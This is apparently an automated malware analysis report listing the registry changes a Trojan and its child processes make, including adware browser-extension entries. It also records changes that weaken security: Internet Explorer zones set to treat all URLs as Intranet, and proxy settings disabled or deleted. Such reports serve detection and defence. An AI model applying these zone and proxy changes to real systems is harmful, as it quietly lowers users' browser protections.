The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 DE BE D4 87 D2 99 5B BE 34 9D AC 22 E9 9E C2"
The process ping.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 03 DB 9F 88 86 BC F1 04 9F 05 35 FA 63 0A 75"
The process ping.exe:3428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D4 C0 56 0C BA 47 F7 E1 0B F6 AF AE 24 09 7E"
The process ping.exe:3660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CC 85 11 45 11 37 88 EE F6 78 7A 2B AE 88 0B"
The process ping.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 38 70 EA 06 56 B3 55 54 E9 25 93 5E 3F 26 3E"
The process ping.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 9B 7C 96 A0 C2 55 A1 41 DE 09 8C 41 09 82 CA"
The process ping.exe:2936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FF BC DA AA AA 4D DB 93 B5 F1 47 CF E1 CF 64"
The process ping.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 B9 EA FF 12 57 54 66 21 18 AC 0A 2C 73 B4 B4"
The process ping.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 23 1E E8 48 D4 F0 48 A1 E9 39 04 2D D6 EC 34"
The process ping.exe:2192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E8 68 D0 41 E5 81 FB 7A 28 33 11 BE 12 4A ED"
The process ping.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 77 78 13 54 0B 10 F2 77 8A D8 71 83 01 B1 47"
The process ping.exe:476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 80 56 CA 89 1B 86 1A 75 55 63 46 C7 6E 2D B5"
The process ping.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D FD 01 25 D4 6D 37 3A 06 96 A6 0A A6 DC 24 A4"
The process ping.exe:3984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 50 80 F0 6A 91 53 75 C6 52 16 C4 49 25 38 93"
The process ping.exe:2828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 12 59 B8 2A 7D 56 B5 78 06 45 5F 11 02 8E FC"
The process ping.exe:2944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 85 23 5B DD F2 54 69 FD 86 47 BA 32 65 7B 8E"
The process ping.exe:2820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 11 B9 8F 6F 79 A5 8C 92 8F 46 58 E7 F7 C4 58"
The process ns19.tmp:3928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E AD C0 91 19 F8 F4 D1 79 40 49 8C F9 4C DB 55"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process ins_sense.exe:2400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 1D DD 77 23 69 22 32 BC 0B 95 93 51 97 50 CA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"f.exe" = "f"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process find.exe:1336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 04 97 DB F6 9C FF 5A C6 F2 30 93 5D 11 AB 37"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process f.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 E9 D8 4B 90 A1 0A 74 2C 6D 18 95 17 EC 64 91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"8593.bat" = "8593"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Wiwyiyugmbkl.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"
[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "70881"
"DisplayVersion" = "1.36.01.22"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\InstalledBrowserExtensions\Webar]
"70881" = "Ge-Force"
[HKLM\SOFTWARE\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 A5 46 9E 60 4A CA 96 E2 36 16 28 E1 B3 05 8A"
[HKLM\SOFTWARE\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "Webar"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sc.exe:3620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 0E 1E AD A9 AA B3 E0 80 61 0D E2 D3 4F B7 25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process sc.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 72 D9 EC 8B DF 64 FC 2D 30 D6 29 9E 68 FB FC"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process sc.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
